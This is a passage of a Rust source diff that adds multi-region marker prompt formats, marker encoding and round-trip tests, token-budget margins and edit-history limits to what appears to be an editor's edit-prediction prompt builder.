+ fn test_write_editable_with_markers_v0317_includes_relative_markers_and_cursor() {
+ let editable = "aaa\nbbb\nccc\n";
+ let mut output = String::new();
+ write_editable_with_markers_v0317(&mut output, editable, 4, "<|user_cursor|>");
+
+ assert!(output.contains("<|marker-0|>"));
+ assert!(output.contains("<|user_cursor|>"));
+
+ let stripped = output.replace("<|user_cursor|>", "");
+ let stripped =
+ collect_relative_marker_tags(&stripped)
+ .iter()
+ .fold(stripped.clone(), |acc, marker| {
+ let tag = &stripped[marker.tag_start..marker.tag_end];
+ acc.replace(tag, "")
+ });
+ assert_eq!(stripped, editable);
+ }
+
+ #[test]
+ fn test_apply_marker_span_v0317_basic() {
+ let old = "aaa\nbbb\nccc\n";
+ let output = "<|marker-0|>aaa\nBBB\nccc\n<|marker+1|>";
+ let result = apply_marker_span_v0317(old, output, Some(0)).unwrap();
+ assert_eq!(result, "aaa\nBBB\nccc\n");
+ }
+
+ #[test]
+ fn test_apply_marker_span_v0317_no_edit() {
+ let old = "aaa\nbbb\nccc\n";
+ let output = "<|marker-0|><|marker-0|>";
+ let result = apply_marker_span_v0317(old, output, Some(0)).unwrap();
+ assert_eq!(result, old);
+ }
+
+ #[test]
+ fn test_encode_v0317_no_edits() {
+ let old = "aaa\nbbb\nccc\n";
+ let result =
+ encode_from_old_and_new_v0317(old, old, Some(5), "<|user_cursor|>", "<|end|>").unwrap();
+ assert_eq!(result, "<|marker-0|><|marker-0|><|end|>");
+ }
+
+ #[test]
+ fn test_roundtrip_v0317() {
+ let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\n";
+ let new = "line1\nLINE2\nline3\n\nline5\nLINE6\nline7\nline8\n";
+ let cursor = Some(6);
+
+ let encoded =
+ encode_from_old_and_new_v0317(old, new, cursor, "<|user_cursor|>", "<|end|>").unwrap();
+ let stripped = encoded
+ .strip_suffix("<|end|>")
+ .expect("should have end marker");
+ let stripped = stripped.replace("<|user_cursor|>", "");
+ let reconstructed = apply_marker_span_v0317(old, &stripped, cursor).unwrap();
+ assert_eq!(reconstructed, new);
+ }
+
+ #[test]
+ fn test_roundtrip_v0317_with_cursor_marker() {
+ let old = "aaa\nbbb\nccc\n";
+ let new = "aaa\nBBB\nccc\n";
+ let result =
+ encode_from_old_and_new_v0317(old, new, Some(5), "<|user_cursor|>", "<|end|>").unwrap();
+ assert!(result.contains("<|user_cursor|>"), "result: {result}");
+ assert!(result.contains("<|marker-0|>"), "result: {result}");
+ }
+
+ #[test]
+ fn test_compute_marker_offsets_v0318_uses_larger_block_sizes() {
+ let text = "l1\nl2\nl3\n\nl5\nl6\nl7\nl8\nl9\nl10\nl11\nl12\nl13\n";
+ let v0316_offsets = compute_marker_offsets(text);
+ let v0318_offsets = compute_marker_offsets_v0318(text);
+
+ assert!(v0318_offsets.len() < v0316_offsets.len());
+ assert_eq!(v0316_offsets.first().copied(), Some(0));
+ assert_eq!(v0318_offsets.first().copied(), Some(0));
+ assert_eq!(v0316_offsets.last().copied(), Some(text.len()));
+ assert_eq!(v0318_offsets.last().copied(), Some(text.len()));
+ }
+
+ #[test]
+ fn test_roundtrip_v0318() {
+ let old = "line1\nline2\nline3\n\nline5\nline6\nline7\nline8\nline9\nline10\n";
+ let new = "line1\nline2\nline3\n\nline5\nLINE6\nline7\nline8\nline9\nline10\n";
+ let encoded =
+ encode_from_old_and_new_v0318(old, new, None, "<|user_cursor|>", "<|end|>").unwrap();
+ let stripped = encoded
+ .strip_suffix("<|end|>")
+ .expect("should have end marker");
+ let reconstructed = apply_marker_span_v0318(old, stripped).unwrap();
+ assert_eq!(reconstructed, new);
+ }
+
+ #[test]
+ fn test_roundtrip_v0318_append_at_end_of_editable_region() {
+ let old = "line1\nline2\nline3\n";
+ let new = "line1\nline2\nline3\nline4\n";
+ let encoded =
+ encode_from_old_and_new_v0318(old, new, None, "<|user_cursor|>", "<|end|>").unwrap();
+
+ assert_ne!(encoded, "<|marker_2|><|end|>");
+
+ let stripped = encoded
+ .strip_suffix("<|end|>")
+ .expect("should have end marker");
+ let reconstructed = apply_marker_span_v0318(old, stripped).unwrap();
+ assert_eq!(reconstructed, new);
+ }
+
+ #[test]
+ fn test_roundtrip_v0318_insert_at_internal_marker_boundary() {
+ let old = "alpha\nbeta\n\ngamma\ndelta\n";
+ let new = "alpha\nbeta\n\ninserted\ngamma\ndelta\n";
+ let encoded =
+ encode_from_old_and_new_v0318(old, new, None, "<|user_cursor|>", "<|end|>").unwrap();
+
+ let stripped = encoded
+ .strip_suffix("<|end|>")
+ .expect("should have end marker");
+ let reconstructed = apply_marker_span_v0318(old, stripped).unwrap();
+ assert_eq!(reconstructed, new);
+ }
+
+ #[test]
+ fn test_encode_v0317_markers_stay_on_line_boundaries() {
+ let old = "\
+\t\t\t\tcontinue outer;
+\t\t\t}
+\t\t}
+\t}
+
+\tconst intersectionObserver = new IntersectionObserver((entries) => {
+\t\tfor (const entry of entries) {
+\t\t\tif (entry.isIntersecting) {
+\t\t\t\tintersectionObserver.unobserve(entry.target);
+\t\t\t\tanchorPreload(/** @type {HTMLAnchorElement} */ (entry.target));
+\t\t\t}
+\t\t}
+\t});
+
+\tconst observer = new MutationObserver(() => {
+\t\tconst links = /** @type {NodeListOf<HTMLAnchorElement>} */ (
+\t\t\tdocument.querySelectorAll('a[data-preload]')
+\t\t);
+
+\t\tfor (const link of links) {
+\t\t\tif (linkSet.has(link)) continue;
+\t\t\tlinkSet.add(link);
+
+\t\t\tswitch (link.dataset.preload) {
+\t\t\t\tcase '':
+\t\t\t\tcase 'true':
+\t\t\t\tcase 'hover': {
+\t\t\t\t\tlink.addEventListener('mouseenter', function callback() {
+\t\t\t\t\t\tlink.removeEventListener('mouseenter', callback);
+\t\t\t\t\t\tanchorPreload(link);
+\t\t\t\t\t});
+";
+ let new = old.replacen(
+ "\t\t\t\tcase 'true':\n",
+ "\t\t\t\tcase 'TRUE':<|user_cursor|>\n",
+ 1,
+ );
+
+ let cursor_offset = new.find("<|user_cursor|>").expect("cursor marker in new");
+ let new_without_cursor = new.replace("<|user_cursor|>", "");
+
+ let encoded = encode_from_old_and_new_v0317(
+ old,
+ &new_without_cursor,
+ Some(cursor_offset),
+ "<|user_cursor|>",
+ "<|end|>",
+ )
+ .unwrap();
+
+ let core = encoded.strip_suffix("<|end|>").unwrap_or(&encoded);
+ for marker in collect_relative_marker_tags(core) {
+ let tag_start = marker.tag_start;
+ assert!(
+ tag_start == 0 || core.as_bytes()[tag_start - 1] == b'\n',
+ "marker not at line boundary: {} in output:\n{}",
+ marker_tag_relative(marker.value),
+ core
+ );
+ }
+ }
+}
@@ -1,4 +1,5 @@
pub mod excerpt_ranges;
+pub mod multi_region;
use anyhow::{Result, anyhow};
use serde::{Deserialize, Serialize};
@@ -24,6 +25,11 @@ fn estimate_tokens(bytes: usize) -> usize {
bytes / 3
}
+/// Leave some slack to avoid overflow.
+fn apply_prompt_budget_margin(max_tokens: usize) -> usize {
+ (max_tokens as f64 * 0.9).floor() as usize
+}
+
#[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)]
pub struct ZetaPromptInput {
pub cursor_path: Arc<Path>,
@@ -81,6 +87,14 @@ pub enum ZetaFormat {
v0226Hashline,
V0304VariableEdit,
V0304SeedNoEdits,
+ /// Multi-block marker spans with NO_EDITS sentinel.
+ V0306SeedMultiRegions,
+ /// Byte-exact marker spans; all intermediate markers emitted; repeated marker means no-edit.
+ V0316SeedMultiRegions,
+ /// V0316 with larger block sizes.
+ V0318SeedMultiRegions,
+ /// V0316, but marker numbers are relative to the cursor block (e.g. -1, -0, +1).
+ V0317SeedMultiRegions,
}
impl std::fmt::Display for ZetaFormat {
@@ -202,7 +216,7 @@ pub fn prompt_input_contains_special_tokens(input: &ZetaPromptInput, format: Zet
.any(|token| input.cursor_excerpt.contains(token))
}
-pub fn format_zeta_prompt(input: &ZetaPromptInput, format: ZetaFormat) -> String {
+pub fn format_zeta_prompt(input: &ZetaPromptInput, format: ZetaFormat) -> Option<String> {
format_prompt_with_budget_for_format(input, format, MAX_PROMPT_TOKENS)
}
@@ -218,6 +232,56 @@ pub fn special_tokens_for_format(format: ZetaFormat) -> &'static [&'static str]
ZetaFormat::v0226Hashline => hashline::special_tokens(),
ZetaFormat::V0304VariableEdit => v0304_variable_edit::special_tokens(),
ZetaFormat::V0304SeedNoEdits => seed_coder::special_tokens(),
+ ZetaFormat::V0316SeedMultiRegions => {
+ static TOKENS: &[&str] = &[
+ seed_coder::FIM_SUFFIX,
+ seed_coder::FIM_PREFIX,
+ seed_coder::FIM_MIDDLE,
+ seed_coder::FILE_MARKER,
+ multi_region::V0316_END_MARKER,
+ CURSOR_MARKER,
+ multi_region::MARKER_TAG_PREFIX,
+ ];
+ TOKENS
+ }
+ ZetaFormat::V0318SeedMultiRegions => {
+ static TOKENS: &[&str] = &[
+ seed_coder::FIM_SUFFIX,
+ seed_coder::FIM_PREFIX,
+ seed_coder::FIM_MIDDLE,
+ seed_coder::FILE_MARKER,
+ multi_region::V0318_END_MARKER,
+ CURSOR_MARKER,
+ multi_region::MARKER_TAG_PREFIX,
+ ];
+ TOKENS
+ }
+ ZetaFormat::V0317SeedMultiRegions => {
+ static TOKENS: &[&str] = &[
+ seed_coder::FIM_SUFFIX,
+ seed_coder::FIM_PREFIX,
+ seed_coder::FIM_MIDDLE,
+ seed_coder::FILE_MARKER,
+ multi_region::V0317_END_MARKER,
+ CURSOR_MARKER,
+ multi_region::RELATIVE_MARKER_TAG_PREFIX,
+ ];
+ TOKENS
+ }
+ ZetaFormat::V0306SeedMultiRegions => {
+ static TOKENS: &[&str] = &[
+ seed_coder::FIM_SUFFIX,
+ seed_coder::FIM_PREFIX,
+ seed_coder::FIM_MIDDLE,
+ seed_coder::FILE_MARKER,
+ seed_coder::START_MARKER,
+ seed_coder::SEPARATOR,
+ seed_coder::END_MARKER,
+ CURSOR_MARKER,
+ multi_region::MARKER_TAG_PREFIX,
+ ];
+ TOKENS
+ }
}
}
@@ -231,6 +295,10 @@ pub fn token_limits_for_format(format: ZetaFormat) -> (usize, usize) {
| ZetaFormat::V0211Prefill
| ZetaFormat::V0211SeedCoder
| ZetaFormat::v0226Hashline
+ | ZetaFormat::V0306SeedMultiRegions
+ | ZetaFormat::V0316SeedMultiRegions
+ | ZetaFormat::V0318SeedMultiRegions
+ | ZetaFormat::V0317SeedMultiRegions
| ZetaFormat::V0304SeedNoEdits => (350, 150),
ZetaFormat::V0304VariableEdit => (1024, 0),
}
@@ -247,7 +315,11 @@ pub fn stop_tokens_for_format(format: ZetaFormat) -> &'static [&'static str] {
| ZetaFormat::V0211Prefill
| ZetaFormat::V0211SeedCoder
| ZetaFormat::V0304VariableEdit
+ | ZetaFormat::V0306SeedMultiRegions
| ZetaFormat::V0304SeedNoEdits => &[],
+ ZetaFormat::V0316SeedMultiRegions => &[multi_region::V0316_END_MARKER],
+ ZetaFormat::V0318SeedMultiRegions => &[multi_region::V0318_END_MARKER],
+ ZetaFormat::V0317SeedMultiRegions => &[multi_region::V0317_END_MARKER],
}
}
@@ -269,7 +341,11 @@ pub fn excerpt_ranges_for_format(
| ZetaFormat::V0211Prefill
| ZetaFormat::V0211SeedCoder
| ZetaFormat::v0226Hashline
- | ZetaFormat::V0304SeedNoEdits => (
+ | ZetaFormat::V0304SeedNoEdits
+ | ZetaFormat::V0306SeedMultiRegions
+ | ZetaFormat::V0316SeedMultiRegions
+ | ZetaFormat::V0318SeedMultiRegions
+ | ZetaFormat::V0317SeedMultiRegions => (
ranges.editable_350.clone(),
ranges.editable_350_context_150.clone(),
),
@@ -344,7 +420,149 @@ pub fn write_cursor_excerpt_section_for_format(
ZetaFormat::V0304VariableEdit => {
v0304_variable_edit::write_cursor_excerpt_section(prompt, path, context, cursor_offset)
}
+ ZetaFormat::V0306SeedMultiRegions => {
+ prompt.push_str(&build_v0306_cursor_prefix(
+ path,
+ context,
+ editable_range,
+ cursor_offset,
+ ));
+ }
+ ZetaFormat::V0316SeedMultiRegions => {
+ prompt.push_str(&build_v0316_cursor_prefix(
+ path,
+ context,
+ editable_range,
+ cursor_offset,
+ ));
+ }
+ ZetaFormat::V0318SeedMultiRegions => {
+ prompt.push_str(&build_v0318_cursor_prefix(
+ path,
+ context,
+ editable_range,
+ cursor_offset,
+ ));
+ }
+ ZetaFormat::V0317SeedMultiRegions => {
+ prompt.push_str(&build_v0317_cursor_prefix(
+ path,
+ context,
+ editable_range,
+ cursor_offset,
+ ));
+ }
+ }
+}
+
+fn build_v0306_cursor_prefix(
+ path: &Path,
+ context: &str,
+ editable_range: &Range<usize>,
+ cursor_offset: usize,
+) -> String {
+ let mut section = String::new();
+ let path_str = path.to_string_lossy();
+ write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok();
+
+ section.push_str(&context[..editable_range.start]);
+ section.push_str(seed_coder::START_MARKER);
+
+ let editable_text = &context[editable_range.clone()];
+ let cursor_in_editable = cursor_offset - editable_range.start;
+ multi_region::write_editable_with_markers(
+ &mut section,
+ editable_text,
+ cursor_in_editable,
+ CURSOR_MARKER,
+ );
+
+ if !section.ends_with('\n') {
+ section.push('\n');
+ }
+ section.push_str(seed_coder::SEPARATOR);
+ section
+}
+
+fn build_v0316_cursor_prefix(
+ path: &Path,
+ context: &str,
+ editable_range: &Range<usize>,
+ cursor_offset: usize,
+) -> String {
+ let mut section = String::new();
+ let path_str = path.to_string_lossy();
+ write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok();
+
+ section.push_str(&context[..editable_range.start]);
+
+ let editable_text = &context[editable_range.clone()];
+ let cursor_in_editable = cursor_offset - editable_range.start;
+ multi_region::write_editable_with_markers_v0316(
+ &mut section,
+ editable_text,
+ cursor_in_editable,
+ CURSOR_MARKER,
+ );
+
+ if !section.ends_with('\n') {
+ section.push('\n');
+ }
+ section
+}
+
+fn build_v0318_cursor_prefix(
+ path: &Path,
+ context: &str,
+ editable_range: &Range<usize>,
+ cursor_offset: usize,
+) -> String {
+ let mut section = String::new();
+ let path_str = path.to_string_lossy();
+ write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok();
+
+ section.push_str(&context[..editable_range.start]);
+
+ let editable_text = &context[editable_range.clone()];
+ let cursor_in_editable = cursor_offset - editable_range.start;
+ multi_region::write_editable_with_markers_v0318(
+ &mut section,
+ editable_text,
+ cursor_in_editable,
+ CURSOR_MARKER,
+ );
+
+ if !section.ends_with('\n') {
+ section.push('\n');
}
+ section
+}
+
+fn build_v0317_cursor_prefix(
+ path: &Path,
+ context: &str,
+ editable_range: &Range<usize>,
+ cursor_offset: usize,
+) -> String {
+ let mut section = String::new();
+ let path_str = path.to_string_lossy();
+ write!(section, "{}{}\n", seed_coder::FILE_MARKER, path_str).ok();
+
+ section.push_str(&context[..editable_range.start]);
+
+ let editable_text = &context[editable_range.clone()];
+ let cursor_in_editable = cursor_offset - editable_range.start;
+ multi_region::write_editable_with_markers_v0317(
+ &mut section,
+ editable_text,
+ cursor_in_editable,
+ CURSOR_MARKER,
+ );
+
+ if !section.ends_with('\n') {
+ section.push('\n');
+ }
+ section
}
fn offset_range_to_row_range(text: &str, range: Range<usize>) -> Range<u32> {
@@ -360,7 +578,7 @@ pub fn format_prompt_with_budget_for_format(
input: &ZetaPromptInput,
format: ZetaFormat,
max_tokens: usize,
-) -> String {
+) -> Option<String> {
let (context, editable_range, context_range, cursor_offset) =
resolve_cursor_region(input, format);
let path = &*input.cursor_path;
@@ -380,16 +598,31 @@ pub fn format_prompt_with_budget_for_format(
input_related_files
};
- match format {
- ZetaFormat::V0211SeedCoder | ZetaFormat::V0304SeedNoEdits => {
- seed_coder::format_prompt_with_budget(
+ let prompt = match format {
+ ZetaFormat::V0211SeedCoder
+ | ZetaFormat::V0304SeedNoEdits
+ | ZetaFormat::V0306SeedMultiRegions
+ | ZetaFormat::V0316SeedMultiRegions
+ | ZetaFormat::V0318SeedMultiRegions
+ | ZetaFormat::V0317SeedMultiRegions => {
+ let mut cursor_section = String::new();
+ write_cursor_excerpt_section_for_format(
+ format,
+ &mut cursor_section,
path,
context,
&editable_range,
cursor_offset,
+ );
+
+ let budget_with_margin = apply_prompt_budget_margin(max_tokens);
+ seed_coder::assemble_fim_prompt(
+ context,
+ &editable_range,
+ &cursor_section,
&input.events,
related_files,
- max_tokens,
+ budget_with_margin,
)
}
_ => {
@@ -403,23 +636,25 @@ pub fn format_prompt_with_budget_for_format(
cursor_offset,
);
+ let mut remaining_budget = apply_prompt_budget_margin(max_tokens);
let cursor_tokens = estimate_tokens(cursor_section.len());
- let budget_after_cursor = max_tokens.saturating_sub(cursor_tokens);
+ remaining_budget = remaining_budget.saturating_sub(cursor_tokens);
let edit_history_section = format_edit_history_within_budget(
&input.events,
"<|file_sep|>",
"edit history",
- budget_after_cursor,
+ remaining_budget,
+ max_edit_event_count_for_format(&format),
);
let edit_history_tokens = estimate_tokens(edit_history_section.len());
- let budget_after_edit_history = budget_after_cursor.saturating_sub(edit_history_tokens);
+ remaining_budget = remaining_budget.saturating_sub(edit_history_tokens);
let related_files_section = format_related_files_within_budget(
&related_files,
"<|file_sep|>",
"",
- budget_after_edit_history,
+ remaining_budget,
);
let mut prompt = String::new();
@@ -428,7 +663,12 @@ pub fn format_prompt_with_budget_for_format(
prompt.push_str(&cursor_section);
prompt
}
+ };
+ let prompt_tokens = estimate_tokens(prompt.len());
+ if prompt_tokens > max_tokens {
+ return None;
}
+ return Some(prompt);
}
pub fn filter_redundant_excerpts(
@@ -448,6 +688,25 @@ pub fn filter_redundant_excerpts(
related_files
}
+pub fn max_edit_event_count_for_format(format: &ZetaFormat) -> usize {
+ match format {
+ ZetaFormat::V0112MiddleAtEnd
+ | ZetaFormat::V0113Ordered
+ | ZetaFormat::V0114180EditableRegion
+ | ZetaFormat::V0120GitMergeMarkers
+ | ZetaFormat::V0131GitMergeMarkersPrefix
+ | ZetaFormat::V0211Prefill
+ | ZetaFormat::V0211SeedCoder
+ | ZetaFormat::v0226Hashline
+ | ZetaFormat::V0304SeedNoEdits
+ | ZetaFormat::V0304VariableEdit
+ | ZetaFormat::V0306SeedMultiRegions
+ | ZetaFormat::V0316SeedMultiRegions
+ | ZetaFormat::V0318SeedMultiRegions
+ | ZetaFormat::V0317SeedMultiRegions => 6,
+ }
+}
+
pub fn get_prefill_for_format(
format: ZetaFormat,
context: &str,
@@ -463,7 +722,11 @@ pub fn get_prefill_for_format(
| ZetaFormat::V0211SeedCoder
| ZetaFormat::v0226Hashline
| ZetaFormat::V0304VariableEdit => String::new(),
- ZetaFormat::V0304SeedNoEdits => String::new(),
+ ZetaFormat::V0304SeedNoEdits
+ | ZetaFormat::V0306SeedMultiRegions
+ | ZetaFormat::V0316SeedMultiRegions
+ | ZetaFormat::V0318SeedMultiRegions
+ | ZetaFormat::V0317SeedMultiRegions => String::new(),
}
}
@@ -472,7 +735,12 @@ pub fn output_end_marker_for_format(format: ZetaFormat) -> Option<&'static str>
ZetaFormat::V0120GitMergeMarkers => Some(v0120_git_merge_markers::END_MARKER),
ZetaFormat::V0131GitMergeMarkersPrefix => Some(v0131_git_merge_markers_prefix::END_MARKER),
ZetaFormat::V0211Prefill => Some(v0131_git_merge_markers_prefix::END_MARKER),
- ZetaFormat::V0211SeedCoder | ZetaFormat::V0304SeedNoEdits => Some(seed_coder::END_MARKER),
+ ZetaFormat::V0211SeedCoder
+ | ZetaFormat::V0304SeedNoEdits
+ | ZetaFormat::V0306SeedMultiRegions => Some(seed_coder::END_MARKER),
+ ZetaFormat::V0316SeedMultiRegions => Some(multi_region::V0316_END_MARKER),
+ ZetaFormat::V0318SeedMultiRegions => Some(multi_region::V0318_END_MARKER),
+ ZetaFormat::V0317SeedMultiRegions => Some(multi_region::V0317_END_MARKER),
ZetaFormat::V0112MiddleAtEnd
| ZetaFormat::V0113Ordered
| ZetaFormat::V0114180EditableRegion
@@ -497,7 +765,52 @@ pub fn encode_patch_as_output_for_format(
cursor_offset,
)
.map(Some),
- ZetaFormat::V0304SeedNoEdits => Ok(seed_coder::no_edits(patch)),
+ ZetaFormat::V0304SeedNoEdits | ZetaFormat::V0306SeedMultiRegions => {
+ Ok(seed_coder::no_edits(patch))
+ }
+ ZetaFormat::V0316SeedMultiRegions => {
+ let empty_patch = patch.lines().count() <= 3;
+ if empty_patch {
+ let marker_offsets = multi_region::compute_marker_offsets(old_editable_region);
+ let marker_num =
+ multi_region::nearest_marker_number(cursor_offset, &marker_offsets);
+ let tag = multi_region::marker_tag(marker_num);
+ Ok(Some(format!(
+ "{tag}{tag}{}",
+ multi_region::V0316_END_MARKER
+ )))
+ } else {
+ Ok(None)
+ }
+ }
+ ZetaFormat::V0318SeedMultiRegions => {
+ let empty_patch = patch.lines().count() <= 3;
+ if empty_patch {
+ let marker_offsets =
+ multi_region::compute_marker_offsets_v0318(old_editable_region);
+ let marker_num =
+ multi_region::nearest_marker_number(cursor_offset, &marker_offsets);
+ let tag = multi_region::marker_tag(marker_num);
+ Ok(Some(format!(
+ "{tag}{tag}{}",
+ multi_region::V0318_END_MARKER
+ )))
+ } else {
+ Ok(None)
+ }
+ }
+ ZetaFormat::V0317SeedMultiRegions => {
+ let empty_patch = patch.lines().count() <= 3;
+ if empty_patch {
+ let tag = multi_region::marker_tag_relative(0);
+ Ok(Some(format!(
+ "{tag}{tag}{}",
+ multi_region::V0317_END_MARKER
+ )))
+ } else {
+ Ok(None)
+ }
+ }
_ => Ok(None),
}
}
@@ -520,10 +833,11 @@ pub fn parse_zeta2_model_output(
None => output,
};
- let (context, editable_range_in_context, context_range, _) =
+ let (context, editable_range_in_context, context_range, cursor_offset) =
resolve_cursor_region(prompt_inputs, format);
let context_start = context_range.start;
let old_editable_region = &context[editable_range_in_context.clone()];
+ let cursor_offset_in_editable = cursor_offset.saturating_sub(editable_range_in_context.start);
let (range_in_context, output) = match format {
ZetaFormat::v0226Hashline => (
@@ -543,6 +857,30 @@ pub fn parse_zeta2_model_output(
output.to_string()
},
),
+ ZetaFormat::V0306SeedMultiRegions => (
+ editable_range_in_context,
+ if output.starts_with(seed_coder::NO_EDITS) {
+ old_editable_region.to_string()
+ } else {
+ multi_region::apply_marker_span(old_editable_region, output)?
+ },
+ ),
+ ZetaFormat::V0316SeedMultiRegions => (
+ editable_range_in_context,
+ multi_region::apply_marker_span_v0316(old_editable_region, output)?,
+ ),
+ ZetaFormat::V0318SeedMultiRegions => (
+ editable_range_in_context,
+ multi_region::apply_marker_span_v0318(old_editable_region, output)?,
+ ),
+ ZetaFormat::V0317SeedMultiRegions => (
+ editable_range_in_context,
+ multi_region::apply_marker_span_v0317(
+ old_editable_region,
+ output,
+ Some(cursor_offset_in_editable),
+ )?,
+ ),
_ => (editable_range_in_context, output.to_string()),
};
@@ -602,6 +940,7 @@ fn format_edit_history_within_budget(
file_marker: &str,
edit_history_name: &str,
max_tokens: usize,
+ max_edit_event_count: usize,
) -> String {
let header = format!("{}{}\n", file_marker, edit_history_name);
let header_tokens = estimate_tokens(header.len());
@@ -612,7 +951,7 @@ fn format_edit_history_within_budget(
let mut event_strings: Vec<String> = Vec::new();
let mut total_tokens = header_tokens;
- for event in events.iter().rev() {
+ for event in events.iter().rev().take(max_edit_event_count) {
let mut event_str = String::new();
write_event(&mut event_str, event);
let event_tokens = estimate_tokens(event_str.len());
@@ -2155,21 +2494,21 @@ pub mod hashline {
Case {
name: "insert_before_first_and_after_line",
original: indoc! {"
- a
- b
- "},
+ a
+ b
+ "},
model_output: indoc! {"
- <|insert|>
- HEAD
- <|insert|>0:61
- MID
- "},
+ <|insert|>
+ HEAD
+ <|insert|>0:61
+ MID
+ "},
expected: indoc! {"
- HEAD
- a
- MID
- b
- "},
+ HEAD
+ a
+ MID
+ b
+ "},
},
];
@@ -2587,12 +2926,30 @@ pub mod seed_coder {
related_files: &[RelatedFile],
max_tokens: usize,
) -> String {
- let suffix_section = build_suffix_section(context, editable_range);
let cursor_prefix_section =
build_cursor_prefix_section(path, context, editable_range, cursor_offset);
+ assemble_fim_prompt(
+ context,
+ editable_range,
+ &cursor_prefix_section,
+ events,
+ related_files,
+ max_tokens,
+ )
+ }
- let suffix_tokens = estimate_tokens(suffix_section.len());
- let cursor_prefix_tokens = estimate_tokens(cursor_prefix_section.len());
+ pub fn assemble_fim_prompt(
+ context: &str,
+ editable_range: &Range<usize>,
+ cursor_prefix_section: &str,
+ events: &[Arc<Event>],
+ related_files: &[RelatedFile],
+ max_tokens: usize,
+ ) -> String {
+ let suffix_section = build_suffix_section(context, editable_range);
+
+ let suffix_tokens = estimate_tokens(suffix_section.len() + FIM_PREFIX.len());
+ let cursor_prefix_tokens = estimate_tokens(cursor_prefix_section.len() + FIM_MIDDLE.len());
let budget_after_cursor = max_tokens.saturating_sub(suffix_tokens + cursor_prefix_tokens);
let edit_history_section = super::format_edit_history_within_budget(
@@ -2600,9 +2957,11 @@ pub mod seed_coder {
FILE_MARKER,
"edit_history",
budget_after_cursor,
+ max_edit_event_count_for_format(&ZetaFormat::V0211SeedCoder),
);
- let edit_history_tokens = estimate_tokens(edit_history_section.len());
- let budget_after_edit_history = budget_after_cursor.saturating_sub(edit_history_tokens);
+ let edit_history_tokens = estimate_tokens(edit_history_section.len() + "\n".len());
+ let budget_after_edit_history =
+ budget_after_cursor.saturating_sub(edit_history_tokens + "\n".len());
let related_files_section = super::format_related_files_within_budget(
related_files,
@@ -2622,8 +2981,9 @@ pub mod seed_coder {
if !edit_history_section.is_empty() {
prompt.push('\n');
}
- prompt.push_str(&cursor_prefix_section);
+ prompt.push_str(cursor_prefix_section);
prompt.push_str(FIM_MIDDLE);
+
prompt
}
@@ -3726,7 +4086,13 @@ pub mod zeta1 {
/// Formats events in zeta1 style (oldest first).
fn format_zeta1_events(events: &[Arc<Event>]) -> String {
let mut result = String::new();
- for event in events {
+ for event in
+ events
+ .iter()
+ .skip(events.len().saturating_sub(max_edit_event_count_for_format(
+ &ZetaFormat::V0114180EditableRegion,
+ )))
+ {
let event_string = format_zeta1_event(event);
if event_string.is_empty() {
continue;
@@ -3964,10 +4330,14 @@ mod tests {
}
}
- fn format_with_budget(input: &ZetaPromptInput, max_tokens: usize) -> String {
+ fn format_with_budget(input: &ZetaPromptInput, max_tokens: usize) -> Option<String> {
format_prompt_with_budget_for_format(input, ZetaFormat::V0114180EditableRegion, max_tokens)
}
+ fn budget_with_margin(requested_tokens: usize) -> usize {
+ ((requested_tokens as f64) / 0.9).ceil() as usize
+ }
+
#[test]
fn test_no_truncation_when_within_budget() {
let input = make_input(
@@ -3979,7 +4349,7 @@ mod tests {
);
assert_eq!(
- format_with_budget(&input, 10000),
+ format_with_budget(&input, 10000).unwrap(),
indoc! {r#"
<|file_sep|>related.rs
fn helper() {}
@@ -3998,6 +4368,7 @@ mod tests {
suffix
<|fim_middle|>updated
"#}
+ .to_string()
);
}
@@ -4009,18 +4380,18 @@ mod tests {
2,
vec![make_event("a.rs", "-x\n+y\n")],
vec![
- make_related_file("r1.rs", "a\n"),
- make_related_file("r2.rs", "b\n"),
+ make_related_file("r1.rs", "aaaaaaa\n"),
+ make_related_file("r2.rs", "bbbbbbb\n"),
],
);
assert_eq!(
- format_with_budget(&input, 10000),
+ format_with_budget(&input, 10000).unwrap(),
indoc! {r#"
<|file_sep|>r1.rs
- a
+ aaaaaaa
<|file_sep|>r2.rs
- b
+ bbbbbbb
<|file_sep|>edit history
--- a/a.rs
+++ b/a.rs
@@ -4033,15 +4404,18 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
assert_eq!(
- format_with_budget(&input, 50),
- indoc! {r#"
- <|file_sep|>r1.rs
- a
- <|file_sep|>r2.rs
- b
+ format_with_budget(&input, budget_with_margin(55)),
+ Some(
+ indoc! {r#"
+ <|file_sep|>edit history
+ --- a/a.rs
+ +++ b/a.rs
+ -x
+ +y
<|file_sep|>test.rs
<|fim_prefix|>
<|fim_middle|>current
@@ -4049,6 +4423,8 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
+ )
);
}
@@ -4084,7 +4460,7 @@ mod tests {
);
assert_eq!(
- format_with_budget(&input, 10000),
+ format_with_budget(&input, 10000).unwrap(),
indoc! {r#"
<|file_sep|>big.rs
first excerpt
@@ -4099,10 +4475,11 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
assert_eq!(
- format_with_budget(&input, 50),
+ format_with_budget(&input, budget_with_margin(50)).unwrap(),
indoc! {r#"
<|file_sep|>big.rs
first excerpt
@@ -4114,6 +4491,7 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
}
@@ -4152,7 +4530,7 @@ mod tests {
// With large budget, both files included; rendered in stable lexicographic order.
assert_eq!(
- format_with_budget(&input, 10000),
+ format_with_budget(&input, 10000).unwrap(),
indoc! {r#"
<|file_sep|>file_a.rs
low priority content
@@ -4165,6 +4543,7 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
// With tight budget, only file_b (lower order) fits.
@@ -4172,7 +4551,7 @@ mod tests {
// file_b header (7) + excerpt (7) = 14 tokens, which fits.
// file_a would need another 14 tokens, which doesn't fit.
assert_eq!(
- format_with_budget(&input, 52),
+ format_with_budget(&input, budget_with_margin(52)).unwrap(),
indoc! {r#"
<|file_sep|>file_b.rs
high priority content
@@ -4183,6 +4562,7 @@ mod tests {
<|fim_suffix|>
<|fim_middle|>updated
"#}
+ .to_string()
);
}
@@ -4224,7 +4604,7 @@ mod tests {
// With large budget, all three excerpts included.
assert_eq!(
- format_with_budget(&input, 10000),
+ format_with_budget(&input, 10000).unwrap(),
